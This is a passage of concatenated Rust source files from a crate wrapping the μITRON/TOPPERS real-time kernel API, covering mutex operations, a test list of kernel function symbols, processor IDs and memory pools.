/// `ref_mtx`: Get the mutex's general information.
#[inline]
#[doc(alias = "ref_mtx")]
pub fn info(self) -> Result<Info, Error<InfoError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::ref_mtx(self.as_raw(), pri.as_mut_ptr()))?;
Ok(Info {
raw: pri.assume_init(),
})
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// # Mutex Operations
impl MutexRef<'_> {
/// `loc_mtx`: Lock the mutex.
#[inline]
#[doc(alias = "loc_mtx")]
pub fn lock(self) -> Result<(), Error<LockError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::loc_mtx(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `tloc_mtx`: Lock the mutex with timeout.
#[inline]
#[doc(alias = "tloc_mtx")]
pub fn lock_timeout(self, tmo: Timeout) -> Result<(), Error<LockTimeoutError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::tloc_mtx(self.as_raw(), tmo.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ploc_mtx`: Attempt to lock the mutex. Returns immediately if it's
/// already locked.
#[inline]
#[doc(alias = "ploc_mtx")]
pub fn try_lock(self) -> Result<(), Error<TryLockError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::ploc_mtx(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `unl_mtx`: Unlock the mutex.
#[inline]
#[doc(alias = "unl_mtx")]
pub fn unlock(self) -> Result<(), Error<UnlockError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::unl_mtx(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ini_mtx`: Initialize the mutex.
#[inline]
#[doc(alias = "ini_mtx")]
pub fn initialize(self) -> Result<(), Error<InitializeError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::ini_mtx(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
#[cfg(feature = "dcre")]
pub use self::owned::*;
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
use super::*;
use crate::wait::QueueOrder;
/// Specifies a priority protection protocol used by a [mutex](Mutex).
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum PriorityProtection {
/// No priority protection.
None,
/// The priority ceiling protocol.
Ceiling {
/// Specifies the priority ceiling.
priority: crate::task::Priority,
},
#[cfg(any(feature = "none", all(feature = "solid_asp3", feature = "pi_mutex")))]
#[cfg_attr(
feature = "doc_cfg",
doc(cfg(any(feature = "none", all(feature = "solid_asp3", feature = "pi_mutex"))))
)]
/// The priority inheritance protocol.
Inherit,
}
impl PriorityProtection {
/// Return `Some(Self::Inherit)` if it's supported by the target kernel.
///
/// # Examples
///
/// ```
/// use itron::mutex::PriorityProtection;
/// let priority_protection = PriorityProtection::inherit()
/// .unwrap_or(PriorityProtection::None);
/// ```
#[inline]
#[allow(unreachable_code)]
pub const fn inherit() -> Option<Self> {
#[cfg(any(feature = "none", all(feature = "solid_asp3", feature = "pi_mutex")))]
{
return Some(Self::Inherit);
}
None
}
}
/// The builder type for [mutexes](Mutex). Created by [`Mutex::build`].
///
/// Its generic parameters are an implementation detail.
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
#[must_use = "`Builder` creates nothing unless you call `.finish()`"]
pub struct Builder {
#[cfg(not(feature = "none"))]
raw: abi::T_CMTX,
priority_protection: PriorityProtection,
}
impl Mutex {
/// `acre_mtx`: Create a builder for `Mutex`.
///
/// # Examples
///
/// ```rust,no_run
/// use itron::mutex::Mutex;
/// let mutex = Mutex::build()
/// .finish()
/// .expect("failed to create a mutex");
///
/// mutex.as_ref().lock()
/// .expect("failed to perform a lock operation");
/// mutex.as_ref().unlock()
/// .expect("failed to perform a unlock operation");
/// ```
///
/// ```rust,no_run
/// use itron::mutex::{Mutex, PriorityProtection};
/// let mutex = Mutex::build()
/// .priority_protection(PriorityProtection::Ceiling { priority: 4 })
/// .finish()
/// .expect("failed to create a priority-ceiling mutex");
///
/// mutex.as_ref().lock()
/// .expect("failed to perform a lock operation");
/// mutex.as_ref().unlock()
/// .expect("failed to perform a unlock operation");
/// ```
#[inline]
#[doc(alias = "acre_mtx")]
pub fn build() -> Builder {
Builder {
#[cfg(not(feature = "none"))]
raw: abi::T_CMTX {
mtxatr: abi::TA_NULL,
ceilpri: 0,
},
priority_protection: PriorityProtection::None,
}
}
}
impl Builder {
/// Specify the priority protection mechanism to use.
/// Defaults to [`None`] when unspecified.
///
/// [`None`]: PriorityProtection::None
#[inline]
pub fn priority_protection(self, value: PriorityProtection) -> Builder {
Builder {
#[cfg(not(feature = "none"))]
priority_protection: value,
..self
}
}
/// Specify the queue order. Defaults to `Fifo` when unspecified.
/// Ignored if
#[inline]
pub fn queue_order(self, value: QueueOrder) -> Builder {
Builder {
#[cfg(not(feature = "none"))]
raw: abi::T_CMTX {
mtxatr: value.as_raw_atr(),
..self.raw
},
..self
}
}
}
impl Builder {
/// Create a mutex using the specified parameters.
#[allow(unused_mut)]
pub fn finish(mut self) -> Result<Mutex, Error<BuildError>> {
match self.priority_protection {
#[cfg(not(feature = "none"))]
PriorityProtection::None => {}
#[cfg(not(feature = "none"))]
PriorityProtection::Ceiling { priority } => {
self.raw.mtxatr = abi::TA_CEILING;
self.raw.ceilpri = priority;
}
#[cfg(all(feature = "solid_asp3", feature = "pi_mutex"))]
PriorityProtection::Inherit => {
self.raw.mtxatr = abi::TA_INHERIT;
}
#[cfg(feature = "none")]
_ => unimplemented!(),
}
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let id = Error::err_if_negative(abi::acre_mtx(&self.raw))?;
// Safety: We own the mutex we create
Ok(Mutex::from_raw_nonnull(abi::NonNullID::new_unchecked(id)))
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// An owned mutex.
///
/// [Deletes] the mutex automatically when dropped. The destructor will
/// panic if the deletion fails.
///
/// [Deletes]: MutexRef::delete
#[derive(PartialEq, Eq)]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub struct Mutex(MutexRef<'static>);
impl fmt::Debug for Mutex {
#[inline]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
self.0.fmt(f)
}
}
impl Drop for Mutex {
#[inline]
fn drop(&mut self) {
unsafe { self.0.delete().unwrap() };
}
}
impl Mutex {
/// Construct a `Mutex` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self(unsafe { MutexRef::from_raw_nonnull(id) })
}
/// Consume and "leak" `self`, returning a reference `MutexRef<'a>`.
#[inline]
pub const fn leak<'a>(self) -> MutexRef<'a> {
let out = self.0;
core::mem::forget(self);
out
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(&self) -> abi::ID {
self.0.as_raw()
}
/// Get the raw object ID as [` abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
self.0.as_raw_nonnull()
}
/// Borrow `Mutex` as [`MutexRef`].
///
/// Use this to perform operations on mutexes because most of the
/// methods are implemented on `MutexRef` but not `Mutex`.
#[inline]
pub const fn as_ref(&self) -> MutexRef<'_> {
self.0
}
}
}
<file_sep>/tests/abi/symbols.rs
pub struct Func {
pub name: &'static str,
}
#[allow(dead_code)]
#[allow(non_upper_case_globals)]
pub mod known_funcs {
macro_rules! funcs {
(
$($name:ident,)*
) => {
$(
pub const $name: super::Func = super::Func {
name: stringify!($name),
};
)*
pub const ALL_NAMES: &[&str] = &[
$(stringify!($name)),*
];
};
}
// All known function names
funcs! {
// Please sort these in a lexicographical order
acre_alm,
acre_alm_ngk,
acre_cyc,
acre_cyc_ngk,
acre_dtq,
acre_flg,
acre_isr,
acre_mbf,
acre_mpf,
acre_mtx,
acre_pdq,
acre_sem,
acre_spn,
acre_tsk,
act_tsk,
adj_tim,
can_act,
can_wup,
chg_ipm,
chg_pri,
chg_spr,
clr_flg,
clr_int,
del_alm,
del_cyc,
del_dtq,
del_flg,
del_isr,
del_mbf,
del_mpf,
del_mtx,
del_pdq,
del_sem,
del_spn,
del_tsk,
dis_dsp,
dis_int,
dis_ter,
dly_tsk,
ena_dsp,
ena_int,
ena_ter,
exd_tsk,
ext_ker,
ext_tsk,
fch_hrt,
fsnd_dtq,
get_inf,
get_ipm,
get_lod,
get_mpf,
get_nth,
get_pid,
get_pri,
get_tid,
get_tim,
get_tst,
ini_dtq,
ini_flg,
ini_mbf,
ini_mpf,
ini_mtx,
ini_pdq,
ini_sem,
loc_cpu,
loc_mtx,
loc_spn,
mact_tsk,
mget_lod,
mget_nth,
mig_tsk,
mrot_rdq,
msta_alm,
msta_cyc,
pget_mpf,
ploc_mtx,
pol_flg,
pol_sem,
prb_int,
prcv_dtq,
prcv_mbf,
prcv_pdq,
psnd_dtq,
psnd_mbf,
psnd_pdq,
ras_int,
ras_ter,
rcv_dtq,
rcv_mbf,
rcv_pdq,
ref_alm,
ref_cyc,
ref_dtq,
ref_flg,
ref_mbf,
ref_mpf,
ref_mtx,
ref_ovr,
ref_pdq,
ref_sem,
ref_spn,
ref_tsk,
rel_mpf,
rel_wai,
rot_rdq,
rsm_tsk,
set_flg,
set_tim,
sig_sem,
slp_tsk,
snd_dtq,
snd_mbf,
snd_pdq,
sns_ctx,
sns_dpn,
sns_dsp,
sns_ker,
sns_loc,
sns_ter,
sta_alm,
sta_cyc,
sta_ovr,
stp_alm,
stp_cyc,
stp_ovr,
sus_tsk,
ter_tsk,
tget_mpf,
tloc_mtx,
trcv_dtq,
trcv_mbf,
trcv_pdq,
try_spn,
tslp_tsk,
tsnd_dtq,
tsnd_mbf,
tsnd_pdq,
twai_flg,
twai_sem,
unl_cpu,
unl_mtx,
unl_spn,
wai_flg,
wai_sem,
wup_tsk,
xsns_dpn,
}
}
<file_sep>/src/processor.rs
//! Multiprocessing
#[allow(unused_imports)]
use core::{convert::TryFrom, fmt, mem::MaybeUninit};
#[allow(unused_imports)]
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
};
define_error_kind! {
/// Error type for [`current`].
pub enum CurrentIdError {
/// The CPU lock state is active.
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
BadContext,
}
}
impl ErrorKind for CurrentIdError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
_ => None,
}
}
}
/// Refers to a single processor in a multi-processor system. The stored
/// processor ID is not guaranteed to be valid but is guaranteed to be non-null.
///
/// In a uniprocessor kernel, this is a zero-sized type.
#[repr(C)]
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct Processor {
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
raw: abi::NonNullID,
_private: (),
}
impl fmt::Debug for Processor {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "Processor({:?})", self.as_raw())
}
}
#[cfg(not(any(feature = "fmp3", feature = "solid_fmp3")))]
#[cfg_attr(
feature = "doc_cfg",
doc(cfg(not(any(feature = "fmp3", feature = "solid_fmp3"))))
)]
impl Processor {
/// The only procesor in a uniprocessor system.
pub const UNIPROCESSOR: Self = Self { _private: () };
/// Used by the `Debug` impl
#[cfg(not(feature = "none"))]
fn as_raw(self) {}
}
#[cfg(any(feature = "fmp3", feature = "solid_fmp3", feature = "none"))]
#[cfg_attr(
feature = "doc_cfg",
doc(cfg(any(feature = "fmp3", feature = "solid_fmp3")))
)]
impl Processor {
/// Construct `Processor` from a raw processor ID.
#[inline]
pub const fn from_raw(raw: abi::ID) -> Option<Self> {
// `map` is not `const fn` yet
if let Some(raw) = abi::NonNullID::new(raw) {
Some(Self::from_raw_nonnull(raw))
} else {
None
}
}
/// Construct `Processor` from a non-null raw processor ID.
#[inline]
pub const fn from_raw_nonnull(raw: abi::NonNullID) -> Self {
match () {
#[cfg(feature = "none")]
() => {
let _ = raw;
Self::UNIPROCESSOR
}
#[cfg(not(feature = "none"))]
() => Self { raw, _private: () },
}
}
/// Get a raw processor ID.
#[inline]
pub const fn as_raw(self) -> abi::ID {
self.as_raw_nonnull().get()
}
/// Get a raw processor ID as [`abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(self) -> abi::NonNullID {
match () {
#[cfg(feature = "none")]
() => unsafe { abi::NonNullID::new_unchecked(1) },
#[cfg(not(feature = "none"))]
() => self.raw,
}
}
}
/// The error type returned when a conversion from `usize` to [`Processor`]
/// fails.
///
/// This can occur because of a number of reasons:
///
/// - The specified value is zero, which represents a null value.
///
/// - The specified value does not fit in [`abi::ID`].
///
/// - The target kernel does not support multiple processors, and the supplied
/// value is not `1`.
///
/// Note that an attempt to create a `Processor` representing a non-existent
/// processor is not guaranteed to fail.
#[derive(Debug, Clone, Eq, PartialEq)]
pub struct ProcessorTryFromError(());
impl TryFrom<usize> for Processor {
type Error = ProcessorTryFromError;
#[cfg(not(any(feature = "fmp3", feature = "solid_fmp3")))]
#[inline]
fn try_from(x: usize) -> Result<Self, Self::Error> {
if x == 1 {
Ok(Self::UNIPROCESSOR)
} else {
Err(ProcessorTryFromError(()))
}
}
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
#[inline]
fn try_from(x: usize) -> Result<Self, Self::Error> {
Self::from_raw(abi::ID::try_from(x).map_err(|_| ProcessorTryFromError(()))?)
.ok_or(ProcessorTryFromError(()))
}
}
/// `get_pid`: Get the current processor's ID.
#[inline]
#[doc(alias = "get_pid")]
pub fn current() -> Result<Processor, Error<CurrentIdError>> {
match () {
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
() => unsafe {
let mut out = MaybeUninit::uninit();
Error::err_if_negative(abi::get_pid(out.as_mut_ptr()))?;
Ok(Processor::from_raw_nonnull(abi::NonNullID::new_unchecked(
out.assume_init(),
)))
},
#[cfg(not(any(feature = "fmp3", feature = "solid_fmp3", feature = "none")))]
() => {
// Uniprocessor
Ok(Processor::UNIPROCESSOR)
}
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
<file_sep>/src/memorypool.rs
//! Memory pools
use core::{fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
time::Timeout,
};
define_error_kind! {
/// Error type for [`MemoryPoolRef::get`].
pub enum GetError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for GetError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MemoryPoolRef::get_timeout`].
pub enum GetTimeoutError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for GetTimeoutError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// E_PAR is considered critial, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MemoryPoolRef::try_get`].
pub enum TryGetError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
}
}
impl ErrorKind for TryGetError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MemoryPoolRef::release`].
pub enum ReleaseError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
/// The supplied memory block does not originate from the memory pool.
#[cfg(not(feature = "none"))]
BadParam,
}
}
impl ErrorKind for ReleaseError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MemoryPoolRef::initialize`].
pub enum InitializeError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InitializeError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MemoryPoolRef::info`].
pub enum InfoError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InfoError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MemoryPool::build`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum BuildError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(any())]
AccessDenied,
/// The specified parameter is not supported by the kernel.
///
/// - On TOPPERS/HRP3, automatic allocation of a memory pool data
/// storage is not supported (`E_NOSPT`, HRPS0199).
///
#[cfg(any())]
NotSupported,
/// Ran out of memory or memory pool IDs, or the specified block size
/// or capacity does not fit in `uint_t`.
#[cfg(not(feature = "none"))]
OutOfMemory,
/// Bad parameter.
#[cfg(not(feature = "none"))]
BadParam,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for BuildError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// `E_MACV` is considered critical, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_NOID | abi::E_NOMEM => Some(Self::OutOfMemory(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR | abi::E_RSATR => Some(Self::BadParam(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`MemoryPoolRef::delete`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum DeleteError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
BadState,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for DeleteError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
_ => None,
}
}
}
/// A pointer to a memory block.
pub type Block = *mut u8;
/// Memory pool information returned by [`MemoryPoolRef::info`].
#[derive(Debug, Clone, Copy)]
pub struct Info {
#[cfg(not(feature = "none"))]
raw: abi::T_RMPF,
}
impl Info {
/// Get the number of free memory blocks.
#[inline]
pub fn free_block_count(&self) -> usize {
match () {
#[cfg(not(feature = "none"))]
() => self.raw.fblkcnt as usize,
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// Get the first waiting task's ID.
#[inline]
pub fn first_waiting_task_id(&self) -> Option<abi::NonNullID> {
match () {
#[cfg(not(feature = "none"))]
() => abi::NonNullID::new(self.raw.wtskid),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// A borrowed reference to a memory pool.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct MemoryPoolRef<'a> {
id: abi::NonNullID,
_phantom: PhantomData<&'a ()>,
}
impl fmt::Debug for MemoryPoolRef<'_> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "MemoryPool({})", self.id)
}
}
/// # Object ID conversion
impl MemoryPoolRef<'_> {
/// Construct a `MemoryPoolRef` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self {
id,
_phantom: PhantomData,
}
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(self) -> abi::ID {
self.id.get()
}
/// Get the raw object ID as [` abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(self) -> abi::NonNullID {
self.id
}
}
/// # Management
impl MemoryPoolRef<'_> {
/// `del_mpf`: Delete the memory pool.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
#[doc(alias = "del_mpf")]
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::del_mpf(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ref_mpf`: Get the memory pool's general information.
#[inline]
#[doc(alias = "ref_mpf")]
pub fn info(self) -> Result<Info, Error<InfoError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::ref_mpf(self.as_raw(), pri.as_mut_ptr()))?;
Ok(Info {
raw: pri.assume_init(),
})
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// # Memory Pool Operations
impl MemoryPoolRef<'_> {
/// `get_mpf`: Acquire a memory block. Blocks the current
/// task if no free memory blocks are available.
#[inline]
#[doc(alias = "get_mpf")]
pub fn get(self) -> Result<Block, Error<GetError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut out = MaybeUninit::uninit();
Error::err_if_negative(abi::get_mpf(self.as_raw(), out.as_mut_ptr()))?;
Ok(out.assume_init())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `tget_mpf`: Acquire a memory block. Blocks the current
/// task with timeout if no free memory blocks are available.
#[inline]
#[doc(alias = "tget_mpf")]
pub fn get_timeout(self, tmo: Timeout) -> Result<Block, Error<GetTimeoutError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut out = MaybeUninit::uninit();
Error::err_if_negative(abi::tget_mpf(
self.as_raw(),
out.as_mut_ptr(),
tmo.as_raw(),
))?;
Ok(out.assume_init())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `pget_mpf`: Acquire a memory block. Fails and returns immediately if no
/// free memory blocks are available.
#[inline]
#[doc(alias = "pget_mpf")]
pub fn try_get(self) -> Result<Block, Error<TryGetError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut out = MaybeUninit::uninit();
Error::err_if_negative(abi::pget_mpf(self.as_raw(), out.as_mut_ptr()))?;
Ok(out.assume_init())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `rel_mpf`: Return a memory block to the memory pool.
#[inline]
#[doc(alias = "rel_mpf")]
pub fn release(self, block: Block) -> Result<(), Error<ReleaseError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::rel_mpf(self.as_raw(), block))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ini_mpf`: Initialize the memory pool.
#[inline]
#[doc(alias = "ini_mpf")]
pub fn initialize(self) -> Result<(), Error<InitializeError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::ini_mpf(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
#[cfg(feature = "dcre")]
pub use self::owned::*;
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
use super::*;
use crate::wait::QueueOrder;
use core::convert::TryInto;
/// The builder type for [memory pools](MemoryPool).
/// Created by [`MemoryPool::build`].
///
/// Its generic parameters are an implementation detail.
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
#[must_use = "`Builder` creates nothing unless you call `.finish()`"]
pub struct Builder<BlockSize, BlockCount> {
block_size: BlockSize,
block_count: BlockCount,
blkcnt_overflow: bool,
blksz_overflow: bool,
#[cfg(not(feature = "none"))]
raw: abi::T_CMPF,
}
/// Builder field hole types
#[allow(non_camel_case_types)]
#[doc(hidden)]
pub mod builder_hole {
pub struct __block_size_is_not_specified__;
pub struct __block_count_is_not_specified__;
}
impl MemoryPool {
/// `acre_mpf`: Create a builder for `MemoryPool`.
///
/// # Examples
///
/// ```rust,no_run
/// use itron::memorypool::MemoryPool;
/// let pool = MemoryPool::build()
/// .block_size(32)
/// .block_count(4)
/// .finish()
/// .expect("failed to create a memory pool");
///
/// let block = pool.as_ref().get()
/// .expect("failed to allocate a block");
/// pool.as_ref().release(block)
/// .expect("failed to deallocate a block");
/// ```
///
#[inline]
#[doc(alias = "acre_mpf")]
pub fn build() -> Builder<
builder_hole::__block_size_is_not_specified__,
builder_hole::__block_count_is_not_specified__,
> {
Builder {
block_size: builder_hole::__block_size_is_not_specified__,
block_count: builder_hole::__block_count_is_not_specified__,
blkcnt_overflow: false,
blksz_overflow: false,
#[cfg(not(feature = "none"))]
raw: abi::T_CMPF {
mpfatr: abi::TA_NULL,
blkcnt: 0,
blksz: 0,
mpf: core::ptr::null_mut(),
mpfmb: core::ptr::null_mut(),
},
}
}
}
